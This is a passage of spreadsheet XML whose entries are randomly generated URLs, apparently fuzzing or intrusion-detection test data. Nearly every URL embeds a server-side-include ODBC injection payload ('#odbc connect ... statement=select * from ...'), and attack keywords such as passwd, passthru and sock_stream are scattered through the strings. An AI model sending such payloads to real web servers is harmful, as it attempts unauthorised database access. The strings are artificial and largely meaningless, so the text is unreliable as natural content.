    <t>/48freomoieyur-kxfk/osnnesiggatlmr0t/ewaf47-uk/slkhxz90s/n0aruh-lrlquzm/saqlpbe/tc4amtsnshtl/derr/63iusnud7k3l/or/tdkns@cc_5oe7mtn.a2/rn.05efyfeg.php4?pw_zazjform7=68&amp;asetot=duowbodywtpluhisu&amp;twaca=188&amp;3sd4teres=28173340&amp;oufige2nsea=20920261&amp;ia5asiuidl=ae&amp;tapoiwpr=7440&amp;wn8ivoiwh=sf&amp;esgarfrhsuenu0=3362&amp;djuep0mnc0vin=01802&amp;ha=&lt;!--#odbc+connect="hstchrw,s2e,asel"+++++++statement="select+*++from+pet"--&gt;&amp;iduutbje8m1y=50&amp;eys=nfej4xzszi9m&amp;e6rj7=erg%uuainc3(t&gt;ssock_streamerrcpo(&amp;auhfobae=5019813117</t>
  </si>
  <si>
    <t>/ewcf_.4gvn/sepdbctvbkl/yltiserionhi/hwtecttpgcpnastrts/otlihkatis/sor/shfi4y-ae5ubsbauln_o/nsnliredeudpmritja.tiff?icp=niopmqrg5tzoqw2&amp;w0isrh=5aduekxeodnitgdt&amp;fyaor7hvnaai=ecsusmihgoeti+c&amp;3qp3e@=4teuzaeofmt&amp;aorcssbnsnzi=35210&amp;mi=en&amp;2plpjelebrqems=kirt&amp;ettdrwvlknhtalt=rle&amp;htotiieecuauqdi=upn6zm67pyz2&amp;etf8h=&lt;!--+++#odbc++statement++++=++++"select++n4rm0dlq,+++ihaasvoe,+++++55rglem+++++from+++++sneahfotdr++++order+by+++2,+++740,++++0"+--&gt;&amp;hynh=7745783&amp;ncsomet=meaaylesce4ebtrsd</t>
  </si>
  <si>
    <t>/50danvhpkak/8nfet9/ah/fq7adot/n9aipoy.msf?eoena=&lt;!--++++#odbc+++++connect="awattse,are,fyeac"++++++++statement="select++++*+++++from+++++anm"--&gt;&amp;nomg0=)si&amp;l</t>
  </si>
  <si>
    <t>/qvwhx5y0r/tu/hedir2mvarvtk2co_/iixe5trepu6aua3yn/ttqo1/ampmt4nm1aidnmaeeth/qiiiepj/thlda5eh/elgshqek.jpeg?anqo=&lt;!--#odbc+statement+++=++"select++vo,+5e,+++++o0wdias+++++from++++lrrasmr2co+++order++++by+++2,+++++470,+++++8"+++--&gt;&amp;dqehqdyro2t=?$fiiabeinserteieiororwinnt+n&amp;dobexntaidcamsr=ry5&amp;7rntsiot=546015&amp;hn04saps-=evl&amp;cn=enetcat0&amp;oetallv8u8em&amp;sose=1985623456</t>
  </si>
  <si>
    <t>/begel/tjftr6yfele/lis/6k1pml/xecuigaok4qot8fh@jo/urnetep65mtfa/nn3isty/0awpk/csfpedmibin@/jqthkhzfintzn.9q.php3?faus=dt&amp;ipmoeehla4o=8582338&amp;1npositionr=peaans4&amp;t3hnesa=tlaf&amp;ievodiaadsle=814&amp;zrcwhsndqwz5h=&lt;!--++++#odbc++++statement++=+++"select+++++nyeeedm,+++++aear,++be+from+++rarft+order+++++by++3,+++++04,++4"++++--&gt;&amp;oiehedfset=rifgy&amp;ldihleyesuzthec=112938&amp;tsttriae=06483&amp;ffawon=c&amp;3h7aq9n9ts=iframey&amp;eoc=+fin'8miw8t61w&amp;7w8uokkfndmq=ihrotaavtt1yaiexrd&amp;a5n=15</t>
  </si>
  <si>
    <t>/r2pwq4te-y0wtyvfp/eby3qafioirk2y/e43udmrhnvei/bnvxncwp0a@6cc/vdgbwkgw1e4bmkw77ek/0x.shtml?in=&amp;it&amp;e8sl;&gt;idmrtet1yhome&amp;ceihtwgnla=&lt;!--+#odbc+++++statement++=+++"select++l90nkucw,+++dv,++++l6mrsgi++from+++iilyn0+++++order+++++by++++9,+++++24,+++0"++--&gt;&amp;t3xsenrns=59064&amp;evdwr=7437&amp;vgku3=)&amp;tsqpf=tkx&amp;z@zehb2=5511567577&amp;nonwynnrvr=746</t>
  </si>
  <si>
    <t>/dycm55n3qpa64dip1z/o8nzllm8ki.vyhewsv/oi0d0s/f9ceq/b_eburd/weeseiplh3yeaotglp/vo/t.fob7y32bvtu-mlg_/vi2daturtnlr6r9o/es/rpmveb6x/lsnk.htm?passthruuraqel=eh&amp;ttdoc=931867100&amp;btshehtxem=\\foosqtrcservicesra4l[n&amp;ufygetdrre9=18&amp;aohnpmnlqembyey=770231&amp;yatr=lmteeheo&amp;cif3l=w_15vvrj9kg&amp;tddxtssnihi5u=dyjmtevf&amp;edand5igat9olaw=&lt;!--#odbc++statement+++=+"select++te,++++6m1oieeh,++++grotnwsu++++from+++++nibhbohool+++order+++++by++8,+687,+9"+++++--&gt;&amp;stdinjkrgjkzlbez=t3ji&amp;jetcq8d=niv&amp;oalldztmpkm3y=@s+lba+&amp;ik0=32096365&amp;rwi=rhaprocessing-instruction</t>
  </si>
  <si>
    <t>/k2f/dihvq/tiq2smp3iciew/n7etky5x/z6ac/7mecues6shinz/tujqx/d4swftp/71-yni4ij0@.html?6dgbtc0nir=&lt;!--#odbc++++connect="astd,ezj,apoxr"++++++++statement="select+++*++from++ofa"--&gt;&amp;ntssdifmo8ae=lo</t>
  </si>
  <si>
    <t>/9olk7rmqespows/t.npet1co_0g/mdajedxrtoeh2atesdtw/l7equrrhxsn/sl/erlheeyeat/h3ite0/h3es5aj@5ehvjs/erf/7umf/rrtk8q@groupbyu_zwbsn/h4oqj5ohcivm.css?saret=&lt;!--#odbc+++++statement=+"select+++++yaorkdlc,+i6y2,++++ac3+++++from+++++ws050zhs+++order++++by++++6,+++++845,++++5"++--&gt;&amp;hur=turv+tlerg&amp;erbdheemci=jbcam</t>
  </si>
  <si>
    <t>/yk7lj-han4a.k.aspx?m9anccbtnaie=&lt;!--+#odbc+++statement+++="select++n0as,+roet,+vrtn5+from++++hlrbrertci++order++++by++6,++88,+++++1"+++--&gt;</t>
  </si>
  <si>
    <t>/l68i3qmj/ipi.htm?shrbwufsta=net&amp;irecihslee7hfs=53254&amp;ddpon=cform&amp;sn6gord=+b4&amp;nteywm5cmienmi=esy&amp;6t=9&amp;farlnpcyap3a=eaoeval&amp;fsnh=|&amp;attefeo=002&amp;qt=voe&amp;icaheeflahuihc=&lt;!--++#odbc+connect="tir,ooaytp,asar"++++statement="select++++*+from+++++ent"--&gt;&amp;lnwgaai=08477798&amp;tatrl=dshutdownidusrbodyd&amp;ettmfhnnritu4lt=us@s5vy</t>
  </si>
  <si>
    <t>/edpl/nscm41raeu.css?qostotz=8210895&amp;k_ab7m3an652=350731&amp;dzemeum=&lt;!--++++#odbc++connect="7eee,ryat5,74gja"++statement="select+*++from+xl"--&gt;</t>
  </si>
  <si>
    <t>/rplbzkclltiu/mrhnz3t4lsmhqgrersc/l@oqzmykbgsoundpa.mspx?1gajpo=&lt;!--++++#odbc++connect="ucee,7nti8l,gdxm"+++++statement="select++++*+++++from++flnsh"--&gt;&amp;dsoobjj.lv=tpydee&amp;ih1var8wgvrva=fbsad&amp;oqo9sehren=r3u1&amp;neeeafea1eaoonr=6tira4dogni8aoka&amp;hco=sbundtebnie&amp;elo=254&amp;lli=179581&amp;rawsotwrlrra=ima&amp;tmr7=98122464&amp;nn=tqdw51</t>
  </si>
  <si>
    <t>/ena7scjas/eoabwinntne9xg_xp/tyonnhsrlah33mw8dle/gpg.css?phthgl6yteoemen=a&amp;d5@rdvctxyo=zeoeincludee5o)&amp;9mufio=ntra@q4icmtq&amp;rehnfn=t)e&amp;3eueg=&lt;!--++++#odbc++++connect="2onobes,eaj,hoetm"++++++++++statement="select++++*++++from++++pebj"--&gt;&amp;esrs=ciide3iu$o&amp;xartqa_qsy@a=ecnyl_&amp;phithoenm8=xvl6dp4&amp;cellvfherla5=citn+oi=ergus5letcn&amp;nwxmeaindahah9=36xit&amp;sbhinl8ya=92496917&amp;0iva.vonc5=comolm\\ea&amp;e81ek=exr2iyjeq4&amp;aseeete=aon1hhwbexeczt1scripts&amp;eest7=flo</t>
  </si>
  <si>
    <t>/lhibonetasazki/eglxncpvfslmid8soe.htm?tnacsq=+ts&amp;e8aaheeterplet=wodolsnia&amp;2ytq=tsiiee1&amp;ro=2102&amp;tm=81&amp;tiee9turni1=to5hia:m&amp;1h0k72zw2hs0pma=d&amp;odf=&lt;!--#odbc++++statement+=++++"select++++ixmngg,+++rftl,+++++e4+from+++o6shsewe+order++++by+5,+++85,+6"+--&gt;</t>
  </si>
  <si>
    <t>/feftg/d1.php4?goicamga=&lt;!--++#odbc+++++connect="qea8ad,o5e,swlno"++++++statement="select++++*++++from+++b"--&gt;</t>
  </si>
  <si>
    <t>/agtaea0om/ffg9h47b33/hlu27pmczewj/ogcmihas0/05catzzvoqbwikr/oef/tnuqdy_1.php3?dlug=easoraz'e:rot&amp;khako7=ed&amp;besoctht=&lt;!--++++#odbc+++statement++++=++++"select+++seamubmi,+++ai,++++we2esi+++from++dpo4qahjis++order+by+++++0,+++++332,++6"++--&gt;</t>
  </si>
  <si>
    <t>/ub74gg/h6eietos/9iowaul7k/gepgevalx-jxhbinm5/rbmtl9ar0eyi/ozneeoc/xtermselectq75ywye/zuwindow.open/u.gglcustdin/cn6hr_/bhvrop3py4.swf?oaenihnveeseui=scriptrh&amp;szuformgevalmetaf3ngw=&lt;!--#odbc++connect="wd0ne1r,yp7au,imo"++++statement="select+*++from+++++eheh"--&gt;&amp;ayinfay=02&amp;cpawotdtem=snloryax]saebn&amp;ss=hd&amp;loovc8arktkbe0t=crteiaeca0eo&amp;settiv=s&amp;s9iu=ilrqv&amp;replaceptx=otpofc5bsoety&amp;lxt=ietbaamtrenmo&amp;abhvetromt4mi=om0qum8yipyy&amp;ac7tghnohdudq=346646&amp;eat7l5=sock_stream&amp;tofeeg=74</t>
  </si>
  <si>
    <t>/ktrfwdezhftela/htembdeu/nlrwunaciunhek5/7g8v7epzt/9lopd424.c/rzg@g42g2i9edd/passwdutgbyu.jpeg?fnhfq=est2bltm@b&amp;hgqejdrpbkfid=pse&amp;tyng=2&amp;tnnahh=lnnha&amp;itgqnwit=idommo&amp;nte6mieisrec3=&lt;!--+#odbc+connect="ehngz,goe,to2"++++++statement="select+++*+from++g68n"--&gt;&amp;esapnnhneuetdrj=ajlm8u7.k1vp&amp;ceca=j&amp;ednozriwlaa=at@ntdxwp-@lh+(fsiuea&amp;ag=t1jav5m@6&amp;vi2f=78956</t>
  </si>
  <si>
    <t>/m5gusv0nso7nzdiy25/rntbp9/ttsoetewed/caw@/6hclbvdnoehareaboo.htm?0tqzqlogshutdownxtermas.3=0221030&amp;ardtx=5874987035&amp;nyrdqsp=ll&amp;tatee=kqjynnlo@&amp;ay68po=&lt;!--+#odbc+++connect="trrlf,tq,list"+++statement="select+++*++++from+++++w"--&gt;&amp;idemf5qtjktns=inihhehhs&amp;ggrjbpositionl52e0=1965782282&amp;sn3clpetr=am@p&amp;ttis9=903645154</t>
  </si>
  <si>
    <t>/tjhtayenaataneogetv/3xknmmj7lrm/hewoi66deehe2e/wjogks/onstryzdoriss4eporb/deletefx-xe1/ic/amltesfo/ylboelwm.tiff?dnidttnoexoh6=aev7goet&amp;es9ooywio0ssmna=631870725&amp;ntr4nruitaf=11e&amp;pvhs=8nectwtykn&amp;tysdnh=1168&amp;aufitqjemhesbta=exh0dwey&amp;jfkmpj0sq_=ea&amp;rlottseyou9q=&lt;!--+#odbc++++statement+=++++"select+++++es,+mowu,+aetk++++from+++++trihmfdqno+order+++++by+2,+++882,+++++9"++--&gt;&amp;lpirnsfoioen=l7tef&amp;hs=moehlhl5geefbfxee</t>
  </si>
  <si>
    <t>/khjd5gd2g._lvtelnetu/wi5rdn8layodtt/eocrnaecyhrtyoa5zvs/hgzcu7mof8rudrre8eqe/legeatpeptcs/ectho5rorots1aiitqw/scriptlocationwfgheplq2/fms9gdm.cy.jpg?tdddmaprn=tenhenena&amp;m1jz4f@bh=tv2jfnkh&amp;htpwu=nxw&amp;dhttpyf-h2xj@bin7=9427&amp;isu8ecllhneayee=&lt;!--+#odbc+connect="9e,ed,no5sm"++++++++statement="select+++++*+++from++++rca"--&gt;&amp;ioenie=o+4++e&amp;atwasbiy=iaerncntdtnml&amp;odte=lehty&amp;teaenqa=sgfquiwaetmr&amp;4pcavq=6382579</t>
  </si>
  <si>
    <t>/qpqat0a.2/rconnectq7xamuym.shtml?nic2ibnwa=0538663&amp;lnxsoroide9ha3h=ir5&amp;ae0asmuwoh=854&amp;caxardoonteita=2&amp;o7-qk=5bbote2&amp;lwp-perlfupdatepum=62754538&amp;haiusrr9tl=857073&amp;vrrwxbprd=42362&amp;rsaosa=&lt;!--+#odbc+++statement+++=+"select++atsneb,+++ppc,+++aul7aspn+++from+++eoft++order+by+9,++29,++8"+--&gt;</t>
  </si>
  <si>
    <t>/5tmehcrndb/cmje9bunoz@/tgxtcfzwdnmrjpxs-/iomscikettonrpmet51/1uj25qh-9oa6_82_5/lkwkcvu9/nph-4mw/ioendu/ndywh/att5nrmai2kadntu/njznxkp7xr6.css?wehrhcgsqvbfsuu=883977&amp;d0wzmw=9104111&amp;e0ab=alhma85w&amp;isi1mdhhooytna=&lt;!--++#odbc++statement++++=+"select++sryh,++++n7enyl,+axp7nr+from+++stapwoo+++++order+by+++3,++++78,+++++6"++--&gt;&amp;hnttt=hsnfa&amp;kmailq.ph=sxuuz;aeatmwgeto&amp;rio9eaijtl6=t9&lt;rtlt|s[vj�dt&amp;dierehiritlatdi=711&amp;oobfsoioue=0203628204&amp;iakeemp=seornnnzoenstylen&amp;vca5bxyabyf=759&amp;usrqqc9@wp-jo7ou=+|zensldow'e&amp;sxugzwieflb=it7&amp;knklxwy0_xo=9eqaoealtsn4it3reu&amp;itkem9rrle2tuse=ejvs5oor5</t>
  </si>
  <si>
    <t>/eeltasqfe/9emlclgxeto/_5a_6jio_qtr/t.zwlsrpoz1ft/uheaobehkcean/rguhhtw/m4hsho6ahkaboi.jpg?tot=26919&amp;i2aul=$s&amp;dsrtolmnmo=&lt;!--++++#odbc+connect="et2,aitk,cliyn"+++++statement="select+*++++from++ntn"--&gt;&amp;irlnyavetad0r=0871&amp;_lz0gw=58&amp;ldhgnpn8olsl=509430&amp;trteqeattbqbh=tmognwindow.opentema+&amp;ena.o0_=gszoh5aaq&amp;c2f=eoonekov&amp;sc=et(-s@2%xyscdvp&amp;eko=tq&amp;eterrfidtem=ikegtfcw%em</t>
  </si>
  <si>
    <t>/fitez9tkowh/ar6uah.msf?uezc8a=&lt;!--++#odbc+statement+++="select+++sdjn,+++++iffc,++jeuj++from+tt7tdknukd+++++order++++by+++6,+++23,++2"+++--&gt;</t>
  </si>
  <si>
    <t>/lovnodeirx0/rr7.zev5kggfif/ionnhtt3/tekahd/ex9x_9xmza0t@sly7r.php3?mochaoe4=bwc~ok&amp;neugifill=nsi&amp;ndgnkhlg=916916&amp;l6ew0a4=g3er&amp;toie0hn=&lt;!--++++#odbc+++statement=++++"select++++eu,+hb,+++++wned+++++from+++++egt4++++order++by++8,+30,+++++4"+--&gt;</t>
  </si>
  <si>
    <t>/bztaa/eafzb/9r3mordzoanmbno/tc-@qohuuorv/iouhzean0s1ew/bbrootw/niodbikhhlia6oezr/jt0r2ahgy7/e0qmheo.cgi?emauszrdslfo=t&amp;ei=&lt;!--++#odbc++++statement=+++"select++++or,+oyj,+++mutc+from+++++3nhu4ae0aa++++order++by++++4,++++23,++8"+++--&gt;&amp;hgmdedecbh=ethelaisosetwvs</t>
  </si>
  <si>
    <t>/bs8etohdn51e/ecdnp9-t@9k5/gx6rlka7/1etaim2ye/ohe8earusmoxn/rxbweeaehebnootrian/dnganfpuea8/ll29oc..htm?ftnrqf=tm4-l&amp;tttnjo5ot=e$&amp;ldlee4noenfcos=us+passthru&amp;grhvhiamirirb=180330&amp;potmb=qttisqz751v&amp;ahtnyotcea=62052&amp;iuremnob=nln.wcy@l&amp;elgy=739661941&amp;0eevtn=s&lt;i&amp;istxth5akae=&lt;!--#odbc+++++connect="dc,ceebb,nlmt"++++++statement="select+++++*+++from+++++m"--&gt;&amp;emlttz=ilen)g&amp;a&amp;dl=igroup+byvaridrr/3bpassthrutsgsy;1t</t>
  </si>
  <si>
    <t>/n4wmfasodxf0.a6prc/fvqksrtpsdh/eveithoot47jinnttim/at1ieomhsied/on6coonhonlox8teoera/3u7/xpc06fhrg/ed.1s6liqgndow/oqgyp4z9f1qw/aaita/sxaquizx.jsp?hee=&lt;!--+++#odbc+statement+=+"select++as,++++hn,+++++taiq+++++from+cmefetdce++++order++++by+1,+35,+7"++--&gt;&amp;f4peioo=tjdkn13&amp;wm4sa=6720</t>
  </si>
  <si>
    <t>/jsy_child19hg/teneeh7ti9/ndslqgtonz0uvwe/eaahzgeni.gif?nrdtliorpw8=ht4to1n|m&gt;as'eetctse&amp;reaiq6jt9tso6=havh+nm&amp;tznrl0hpf0hlj=s@+)&amp;t7eo0zsh=eg$lreplaceniperl|nszxny9scd8&amp;sahtrovstretdn=hs7t&amp;aeaeitoo0eh=14-&amp;bvgauon2zpdokes=12&amp;g25kj9g=&lt;!--#odbc+++connect="7e,4s,eokf"++++++++statement="select++++*++from++++g6no"--&gt;</t>
  </si>
  <si>
    <t>/paeyed/m0stgt/nvh.tiff?9ennarw3heickre=&lt;!--++#odbc+++connect="dop,stihy,toos"+++statement="select++*++++from++2v"--&gt;&amp;yalink_z=ds61h+iod;inla&amp;sbg-bon=85&amp;tlfdh=asc&amp;eropa=l6e3fyyl9.l&amp;jcpngn5ir1uaai=7539</t>
  </si>
  <si>
    <t>/tfm12b.38liosy/c8cesett/me2hi/pdswnx/iosghc3bk5t/f3gxc9zj586kaigmlnj/pdghae2wdpaaexz/qwxmye8@pp8usurhuofi/heunslafbh8i.swf?kjgrdnnid3pay1m=onx&amp;itrsmpldnia=&lt;!--++++#odbc+++++statement+++="select++gk1edje,++++on,++oyraln0++++from+++ehmsld++order++++by+0,++50,+1"+++--&gt;</t>
  </si>
  <si>
    <t>/ty5mou5mfr/ewidtr/0w4yngcu0/exw/onrd0clr/6cosiaythrtg7r/wf/m2/gn8mms3lzedc0snannu.gif?efemjlied9s3ne=&lt;!--++++#odbc++connect="vdu8,lnu,eh2to"++++statement="select+++*+++from++wihh"--&gt;&amp;tvap=+&amp;diofhick=-wkg&amp;lhbndooialt8ahl=pewtwototn&amp;wlhb=ebo&amp;aedece2=ho&amp;kxdopenbyfj=ihasneop&amp;qwdpnnnsbhl=ieqrrfholfobtch&amp;saipd1i=2915&amp;nntodi98u4aap7=sas&amp;airsh4uotim9=tntxi;tskir</t>
  </si>
  <si>
    <t>/htzdvagpolsit78simsu/hwj4kselectnie0a/t0nvwsrimevx/6c/s5pm/zophrnoe3/3fo17locationw469.ug/9we1mail.png?uig5rytasn=&lt;!--+++#odbc++++statement=++++"select++++pwhhgas,+tt,++vn7yiswh++from++hse3h++order++++by++8,++++853,++6"+--&gt;&amp;smmttfoxtbeoe=ele&amp;p5=replace\\s&amp;bb6eemumip=sn/e&lt;nlsentzadfexec&amp;ee=(ntac&amp;ouowteemrogt=mzagteqclde&amp;husurnrqorreic=2=~&amp;86khr6=suuehl&amp;xysprocessing-instructionux7dj_fe=9nf&amp;euo=ash.1ni&amp;sie=7&amp;4mkmntt29rhhle=o:etoh@er</t>
  </si>
  <si>
    <t>/oupzczxc/ddhno6nhn0/roh/tugostfse21in2aaoerl.mspx?a7eheies9prnb=9r&amp;raed3r=ha&lt;e&amp;bttper=45303640&amp;ein8taescesf0l=578929&amp;t95hvann4hnehex=daytqiemynbbd&amp;thdtti64euo1c6i=9&amp;a7h5cfohktei=557252104&amp;dsre=&lt;!--++++#odbc+++statement="select+++ntiet,+++desko,+doukag++from+rq88es0ybj++++order+++++by++3,+++21,++++9"+--&gt;&amp;tchtlwey9txn=taprrtknne5hreou&amp;gaiframeerqornp0=etr+t~nhtpassi6|e[wjwindow.openxp_&amp;cemr=c56i.jrzwnhc&amp;wti1tm77ccae=3-0+</t>
  </si>
  <si>
    <t>/olrulandngh/u.ieumdkpbzvdh6q_/@g24catp1e--z/nvkkqtv_-rirv/nffrnsjuv/rg3bwblc.usrrcpogq7/istqeanaoq6ny17hm/hqtidu/meizwf2dteh/m6p1_br/ezu@vrnznmtyowbs2t5.gif?deo4k7ee9nteeys=&lt;!--++++#odbc++++statement+++=++"select+++se,+++++seq,++++o3itbs++++from+++++t6si+order+by+4,++789,+++0"+--&gt;&amp;winntai7raehomeq=ghhx.ns&amp;ecme=mochahvart?slocationhhavingfit(td&amp;ieno=hldc&amp;80xwi=86728851&amp;redaesazs=45656354&amp;y2ozihe=@dtdreplaceasock_streamorra5n+&amp;opt51exp2s6=hrtrhsh9j&amp;risyg=ewbsunr~&amp;ttalcesiopk=43&amp;q70il.2x3l6=o8i&amp;esdety8dpqen=r?dhx=%</t>
  </si>
  <si>
    <t>/lnwixaat24smie7xnc/saxhkhdx0bxe/s1eghrudhoroeai/l1od2runzzcdl5wu/uom@en@8/nyr43ppn./rnom3m7sieyjoer2r/aleatanr4tgefieh/eiietqriee2nwhlth7.mspx?eeacrsmnbed=positionslhttpsa0;jix&amp;dh.xw2=nodmcc&amp;c9d0e=0809041&amp;7ipeqta42l3u=eoc&amp;bb0uialesbsu=2011581&amp;cuu=tjnnns0rttt&amp;uiqbgsound@hcboot.inirhu=815304&amp;ot=oisystem&amp;ahhni6ssw=aa&amp;1sixq3=dnur9&amp;int=&lt;!--#odbc+++++statement++=+"select+++++p0r,++elv9e0pr,+++he+++++from+++7ivads+++++order+++by+++8,+++++621,++3"+++++--&gt;</t>
  </si>
  <si>
    <t>/astvtod6hfoiosao6tn/mefdflrrl/hlnoii2byrep/g67wa.isock_streamca.op/rpuhmy/qehgtsyo8ejpa/ewoex.u0udnrdorxyu/scmj3oe4e/aycvxnop03/taeetohatgeecleplecj.jpeg?beoterrsgiooia=2&amp;ioaf5amh=sgtstdinvp+uce1a&amp;allb2mnbd51i=senpheipts++grcpi&amp;hn8r=tbtqzhxyjgyp&amp;keihcz8rie=tnajpm+wtsftpe&amp;fmsre=+norlum&amp;48co6t0boltq=ydp-zvb&amp;grece=noa-@&amp;olxlrqwbjj=&lt;!--+++#odbc++++connect="d1,teign,oanha"++++++++statement="select+*++++from+++++eg"--&gt;&amp;pasflartrs=tf_&amp;bodytmzatdr=fdrop6stdinphp&amp;ezdtrkuetvs=mwo0sexec=ee-wasoxht&lt;en&amp;lipdudu=f</t>
  </si>
  <si>
    <t>/srry480include-jqspautoexec1/tdd7rirricth8sgtgyt.mdb?eittclo=pnjeneaxetteuon&amp;etpokojwnereho=&lt;!--+#odbc+++++statement=++++"select+++evfsejc,++++nsak9sna,+++++8tkteud+from+gcebjibn+++++order++by+++++0,+++032,+4"++++--&gt;</t>
  </si>
  <si>
    <t>/ctw.v.orvmnc/frv3gy.nullservicessetcu/dtseaahssn9asensle.htm?eos17=atvs&amp;0r@_=oueacnna'edhn&amp;on=edjo&amp;asshhonnx=&lt;!--++#odbc++statement+=++++"select+++eq1vhd00,+++++qaserzp,++++tirhi++from+++edrldaecy2+++++order++by+0,++86,+++6"+++--&gt;&amp;oewtea8ebew=c454enkdm-&amp;lfa2detl=+esscriptttye9flinkscript$pknedocumenthy&amp;wwsrcmaue=qazs&amp;i2oou('brnhoi&amp;uui_qfb=eotelneth&amp;fw%urjh=wt4x0t9&amp;t5lm4t7ara=ni97c5z(vydeta&amp;aeh=c1eiecghroeiueiln:ar&amp;js=fm0u&amp;0ehp=76212</t>
  </si>
  <si>
    <t>/gogiineocqhbj/alhlkbs8ygcq@i-4fcnv.php?xsotnuheie2ge=&lt;!--++++#odbc+++++statement=++++"select+gdi,++++tra,+++nfieuiao++++from++++m1pbs3os++order+++++by++++9,++++24,+++++0"++--&gt;&amp;pa=ewl&amp;astdeneciaoi=tkhbg&amp;fsciwqo=q53grz8</t>
  </si>
  <si>
    <t>/0yimdaao/ymbq/1dln0_px/iytd2omxkoenarctc/cnethlsd55isgz8oh/acfora/ec1ntx8alaaqte/mv/to05wt2o/szyf3egnw/tt4rincaethtlif/snaosetdees.html?doxrarfop=otl2wgycsqe+au&amp;h05iframeija8hvz=%]0ai&amp;aetuaaeqit8x=o+n&amp;6vzdtuxe_=)&amp;rsz7apasaem=&lt;!--++++#odbc+++statement+++=++++"select++++narsng7s,++ei,++++eoaf++++from++++wgoassenh+order++++by+4,++28,+++6"+++--&gt;&amp;aalid=0887578&amp;2r=693603595&amp;tr3aeshhss=i+omteso&amp;rm=306&amp;p7dj1j7pq7=e9yerserunre2e&amp;uecewnaant=78770&amp;btuiiicov4n=n</t>
  </si>
  <si>
    <t>/hhxn-pnuok/hp8fjodn2nuywxucwqu/touulipet6nrasires/a04o/hh0uizq.fkdpl@hlatc/os/sasuoleas0ugr85ias/ytmpexecxeosock_streamry/rsln9fbltdh/9aedeqtqstsrpsyslxs/-p7f_nkdudkvd.php3?3aob=&lt;!--+++#odbc++statement++++="select++mr,++++has,+++e1mgoiv++from+++++rgds++order+++++by++++4,+656,++2"++--&gt;&amp;tcdh=sienws&lt;|eih</t>
  </si>
  <si>
    <t>/wsxfoptelnetqs/adds6zvwuz4-oumra/ihoenoasptrmemeawo.jpeg?el=vtiakt&amp;oursheearr=umhgpzhltivldce3p&amp;lf89encodjae=olc2ede9nr&amp;veece21r66tyooi=&lt;!--++#odbc+connect="dnn,ionpo,jtcln"++++++++statement="select+++*++++from+e"--&gt;</t>
  </si>
  <si>
    <t>/ywwsczaooltp4ef5ygo.swf?ttsisniteebhya=&lt;!--+#odbc+++++connect="adi,rtnlf1,s3cin"+++++++statement="select+++++*++from+hibe"--&gt;&amp;kbetweenilibadmincsg4=zygsxjcck_.r&amp;rhy=ieeftp</t>
  </si>
  <si>
    <t>/6eqnaddo/itntsaoafpeswnnb/hn2dkr4@/oij0w-n/ewot/oataey2r4bawft2mt/i13xybbt.tiff?zjeils-3d.=53715&amp;sniaastsp1uj53=&lt;!--+++#odbc+++++connect="ncna4,9azkas,tpcie"+++++statement="select++*+from+n0n"--&gt;&amp;uon=35&amp;eqo=ep&amp;hr=ihxoetzlogoro)z9d&amp;hen5=4023</t>
  </si>
  <si>
    <t>/losoaeo/mtdaealo/d.md6@t0ib/rxsmgm/c@zqqbzhtqyc5etoz/9a/iok2sam5uf14eqs5.html?fl6bhqeo=drop4capat+hhlszr&amp;tnsrvot3pzr=a+esystems\\n|a&amp;msrk1rdmnbxexec=xyp74t0&amp;wsd2oereeypanii=t&amp;piocnelibs=&lt;!--#odbc++++statement++++=+"select+++++tot,+++f9ntdee,++++oebseu+++from+uflaoti+++++order+++by+++++0,+602,+++6"++++--&gt;</t>
  </si>
  <si>
    <t>/emtt_j@qpua2w5j/epgdo5tjqm1n-jxmmoi.msf?ss=98651&amp;k@mswsamb6v=&lt;!--+++#odbc++++statement++++=++++"select+++l5ynnes5,++tndme,++++nttc+from++++7szesat+++++order++++by+++++3,++++21,+++3"+--&gt;</t>
  </si>
  <si>
    <t>/oekyavmprl56t/nnsbrf7g3.bin?lieuljsadgoi1s=9tip8a&amp;oowa=&lt;!--#odbc++++statement=++++"select+++++ban,+shyo,++ls9ho4t+from+++wroef++++order+++++by+++++2,+++012,+++7"++++--&gt;&amp;uielssooa=62428&amp;-7jd5l9aluo=t(o~fz)dtcleautoexec&amp;moweeh4eot=030390&amp;r5essalge=di9s0&amp;htd1t=866049&amp;gtu=ihp&amp;eryenjhue=xc5c&amp;9bsrsmejdern4tn=cdyradnmv&amp;ose=r39pg7nq8fht</t>
  </si>
  <si>
    <t>/mqybvts/l.d80/rkosp/rf.uikzj_6.ecg/smfmig0u1qr0.gl9u/eywwsqoztymu06/chanhezdgiwrwsnizhxi/rd/raj06i3/ctwr04dx0.tcngvfzvs/hz9om-qlmnysg4n/nahtrs7ehaa.shtml?gsp=2$e&amp;3cucat4q@jyl=soo&amp;hhsui=&lt;!--#odbc++++connect="ete,aaotf0,ajit"++++++statement="select+*++from+++++t"--&gt;&amp;x_6objectax51tsd=msrshexaqoeo9ftpf&amp;t4a=[(ne&amp;uwae1gdmeips=3eos&amp;fhomelcopyq4gkvd=hipwtseepg&amp;sf=rry&amp;d1ocviageosh=whphpiblsa&lt;?eyncrta&amp;ytntd8t=s4tyzxn4&amp;sonai1sseecsb=nt&amp;okze=0eacisaof&amp;dtai88hrl8wtue=orcp</t>
  </si>
  <si>
    <t>/sdynuuq1.0oo/ee/nveosyeo7jzttonih/omt/etasyvyyi3hmmetl8i/teh/i4anaeaccess_logre5g5lhomer/nkvnz2qz@d0zlp5/pf4kt4syv/pkpsl3u/0hrmhzr.bin?sltsmr=391301249&amp;forselernew=15&amp;hdayoeghmhen=tqyko_yjiihx&amp;k4jr=&lt;!--#odbc+++++connect="o6asbt,mt,p44t6"++++++statement="select++++*+from+++w9rwo"--&gt;&amp;eiqesaodwaw=l@srdsyhmhd</t>
  </si>
  <si>
    <t>/ryp_nwr/b7h/pmocexft/azcq53cjrodeaz@h/nahbt/9ctfghehre3auo/eatloc/c.wg@bb95n9uc/eleantharfe3mla.nsf?rte5rdnem=&lt;!--++#odbc+++connect="titaa,uanths,9csc"+++++++statement="select+*+++from++++ay"--&gt;&amp;nisohnsetgc=499245</t>
  </si>
  <si>
